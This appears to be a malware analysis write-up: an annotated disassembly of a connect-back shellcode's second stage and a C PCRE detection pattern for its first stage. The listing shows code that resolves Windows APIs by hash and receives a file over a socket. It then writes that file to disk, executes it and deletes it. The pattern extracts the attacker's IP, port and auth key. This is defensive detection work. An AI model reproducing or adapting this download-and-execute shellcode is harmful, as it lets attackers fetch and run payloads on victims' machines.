004020d3   b4 02            mov ah,2
004020d5   50               push eax
004020d6   55               push ebp
004020d7   53               push ebx
004020d8   ba 005860e2      mov edx,e2605800
004020dd   ffd6             call esi                                 ; recv()
004020df   bf acac0685      mov edi,8506acac                         ; ! this is the auth key
004020e4   ffe5             jmp ebp                                  ; jump to stage 2

Stage 2

0040229a   83ec 20          sub esp,20
0040229d   8bec             mov ebp,esp
0040229f   895d 04          mov dword ptr ss:[ebp+4],ebx
004022a2   897d 00          mov dword ptr ss:[ebp],edi               ; save auth key in [ebp]
004022a5   81ec 00020000    sub esp,200
004022ab   8965 14          mov dword ptr ss:[ebp+14],esp
004022ae   33db             xor ebx,ebx
004022b0   64:8b43 30       mov eax,dword ptr fs:[ebx+30]
004022b4   8b40 0c          mov eax,dword ptr ds:[eax+c]
004022b7   8b70 1c          mov esi,dword ptr ds:[eax+1c]
004022ba   ad               lods dword ptr ds:[esi]
004022bb   8b78 08          mov edi,dword ptr ds:[eax+8]
004022be   897d 08          mov dword ptr ss:[ebp+8],edi
004022c1   e8 45000000      call link-03.0040230b
004022c6   53               push ebx                                 ; ----- syscall lookup fn
004022c7   56               push esi
004022c8   8b5f 3c          mov ebx,dword ptr ds:[edi+3c]
004022cb   8b5c3b 78        mov ebx,dword ptr ds:[ebx+edi+78]
004022cf   03df             add ebx,edi
004022d1   53               push ebx
004022d2   8b5b 20          mov ebx,dword ptr ds:[ebx+20]
004022d5   03df             add ebx,edi
004022d7   53               push ebx
004022d8   83c3 04          add ebx,4
004022db   8b33             mov esi,dword ptr ds:[ebx]
004022dd   03f7             add esi,edi
004022df   33c9             xor ecx,ecx
004022e1   ac               lods byte ptr ds:[esi]
004022e2   32c8             xor cl,al
004022e4   c1c1 05          rol ecx,5
004022e7   84c0             test al,al
004022e9  ^75 f6            jnz short link-03.004022e1
004022eb   2bca             sub ecx,edx
004022ed  ^75 e9            jnz short link-03.004022d8
004022ef   58               pop eax
004022f0   2bd8             sub ebx,eax
004022f2   d1eb             shr ebx,1
004022f4   5e               pop esi
004022f5   035e 24          add ebx,dword ptr ds:[esi+24]
004022f8   03df             add ebx,edi
004022fa   66:8b0b          mov cx,word ptr ds:[ebx]
004022fd   8b5e 1c          mov ebx,dword ptr ds:[esi+1c]
00402300   03df             add ebx,edi
00402302   8b048b           mov eax,dword ptr ds:[ebx+ecx*4]
00402305   03c7             add eax,edi
00402307   5e               pop esi
00402308   5b               pop ebx
00402309   ffe0             jmp eax                                  ; ------
0040230b   5e               pop esi
0040230c   68 33320000      push 3233
00402311   68 7773325f      push 5f327377
00402316   54               push esp
00402317   ba 926e0484      mov edx,84046e92
0040231c   ffd6             call esi                                 ; loadlibrarya()
0040231e   8945 0c          mov dword ptr ss:[ebp+c],eax
00402321   8bf8             mov edi,eax
00402323   53               push ebx                                 ; int flags
00402324   6a 04            push 4                                   ; int len
00402326   55               push ebp                                 ; const void *buf (auth key from stage 1)
00402327   ff75 04          push dword ptr ss:[ebp+4]                ; int s
0040232a   ba 009066e0      mov edx,e0669000
0040232f   ffd6             call esi                                 ; send()
00402331   83f8 04          cmp eax,4
00402334   0f85 c5000000    jnz link-03.004023ff
0040233a   8b7d 08          mov edi,dword ptr ss:[ebp+8]
0040233d   e8 0d000000      call link-03.0040234f
00402342   6377 64          arpl word ptr ds:[edi+64],si             ; not code: the 13 bytes up to 0040234f are a NUL-terminated
                                                                      ; filename ("cwdoz.exe" in this listing, "ilkhcvd.exe" in the dump
                                                                      ; above) whose address the call/pop pair leaves in [ebp+18] for createfilea
00402345   6f               outs dx,dword ptr es:[edi]               ; i/o command
00402346   7a 2e            jpe short link-03.00402376
00402348   65:78 65         js short link-03.004023b0                ; superfluous prefix
0040234b   0000             add byte ptr ds:[eax],al
0040234d   0000             add byte ptr ds:[eax],al
0040234f   8f45 18          pop dword ptr ss:[ebp+18]                ; ---- reply sent
00402352   53               push ebx
00402353   6a 02            push 2
00402355   6a 01            push 1
00402357   53               push ebx
00402358   53               push ebx
00402359   68 000000c0      push c0000000
0040235e   ff75 18          push dword ptr ss:[ebp+18]
00402361   ba 3dd36b5c      mov edx,5c6bd33d
00402366   ffd6             call esi                                 ; createfilea
00402368   8945 1c          mov dword ptr ss:[ebp+1c],eax
0040236b   40               inc eax
0040236c   0f84 8d000000    je link-03.004023ff                      ; errorhandling
00402372   8b7d 0c          mov edi,dword ptr ss:[ebp+c]
00402375   33c0             xor eax,eax
00402377   50               push eax
00402378   b4 02            mov ah,2
0040237a   50               push eax
0040237b   ff75 14          push dword ptr ss:[ebp+14]
0040237e   ff75 04          push dword ptr ss:[ebp+4]
00402381   ba 005860e2      mov edx,e2605800
00402386   ffd6             call esi                                 ; recv()
00402388   8b7d 08          mov edi,dword ptr ss:[ebp+8]
0040238b   85c0             test eax,eax
0040238d   74 1e            je short link-03.004023ad                ; u!
0040238f   8bc8             mov ecx,eax
00402391   41               inc ecx
00402392   74 57            je short link-03.004023eb                ; errorhandling
00402394   53               push ebx
00402395   8d4d 10          lea ecx,dword ptr ss:[ebp+10]
00402398   51               push ecx
00402399   50               push eax
0040239a   ff75 14          push dword ptr ss:[ebp+14]
0040239d   ff75 1c          push dword ptr ss:[ebp+1c]
004023a0   ba b9bef5cb      mov edx,cbf5beb9
004023a5   ffd6             call esi
004023a7   85c0             test eax,eax
004023a9   74 40            je short link-03.004023eb
004023ab  ^eb c5            jmp short link-03.00402372
004023ad   ff75 1c          push dword ptr ss:[ebp+1c]
004023b0   ba 5c93c59d      mov edx,9dc5935c
004023b5   ffd6             call esi
004023b7   6a 44            push 44
004023b9   58               pop eax
004023ba   2be0             sub esp,eax
004023bc   8bfc             mov edi,esp
004023be   8bd7             mov edx,edi
004023c0   ab               stos dword ptr es:[edi]
004023c1   33c0             xor eax,eax
004023c3   6a 10            push 10
004023c5   59               pop ecx
004023c6   ab               stos dword ptr es:[edi]
004023c7  ^e2 fd            loopd short link-03.004023c6
004023c9   8b7d 08          mov edi,dword ptr ss:[ebp+8]
004023cc   52               push edx
004023cd   52               push edx
004023ce   50               push eax
004023cf   50               push eax
004023d0   50               push eax
004023d1   50               push eax
004023d2   50               push eax
004023d3   50               push eax
004023d4   50               push eax
004023d5   ff75 18          push dword ptr ss:[ebp+18]
004023d8   ba 2cf19426      mov edx,2694f12c
004023dd   ffd6             call esi
004023df   58               pop eax
004023e0   fec7             inc bh
004023e2   53               push ebx
004023e3   50               push eax
004023e4   ba 01d634de      mov edx,de34d601
004023e9   ffd6             call esi
004023eb   ff75 1c          push dword ptr ss:[ebp+1c]
004023ee   ba 5c93c59d      mov edx,9dc5935c
004023f3   ffd6             call esi                                 ; closehandle()
004023f5   ff75 18          push dword ptr ss:[ebp+18]
004023f8   ba 3d53cf27      mov edx,27cf533d
004023fd   ffd6             call esi                                 ; deletefilea()

004023ff   8b7d 0c          mov edi,dword ptr ss:[ebp+c]             ; --- error handling
00402402   ff75 04          push dword ptr ss:[ebp+4]
00402405   ba 85563107      mov edx,7315685
0040240a   ffd6             call esi                                 ; closesocket()
0040240c   8b7d 08          mov edi,dword ptr ss:[ebp+8]
0040240f   ba ba460cc1      mov edx,c10c46ba
00402414   ffd6             call esi                                 ; exitthread()

Pattern

	/*
	 * Detection pattern for stage 1 (see the "Stage 1" listing).  It keys on
	 * the push ebx / push ebx / push <addr> / push <family,port> sequence
	 * that builds the sockaddr_in before connect(), and on the mov edi,<key>
	 * that precedes the jmp ebp into stage 2.  Capture groups, in order:
	 *   1: 4 bytes  connectback IPv4 address (the push after \x53\x53\x68)
	 *   2: 2 bytes  connectback port (the word after the \x02\x00 family)
	 *   3: 4 bytes  authentication key (the mov edi,imm32 before \xff\xe5)
	 */
	const char *linkPCRE =
		".*"
		"\\x53\\x53\\x68(....)"                    /* push ebx; push ebx; push <ip>   */
		"\\x68\\x02\\x00(..)"                      /* push <family 2,port>            */
		"\\x8B\\xD4\\x8B\\xD8\\x6A\\x10\\x52\\x53" /* mov edx,esp; mov ebx,eax; args  */
		"\\xBA\\x63\\x30\\x60\\x5A\\xFF\\xD6"      /* connect() via the hash in edx   */
		"\\x50\\xB4\\x02\\x50\\x55\\x53"           /* recv() arguments                */
		"\\xBA\\x00\\x58\\x60\\xE2\\xFF\\xD6"      /* recv()                          */
		"\\xBF(....)"                              /* mov edi,<auth key>              */
		"\\xFF\\xE5"                               /* jmp ebp                         */
		".*";
 

Dependencies

 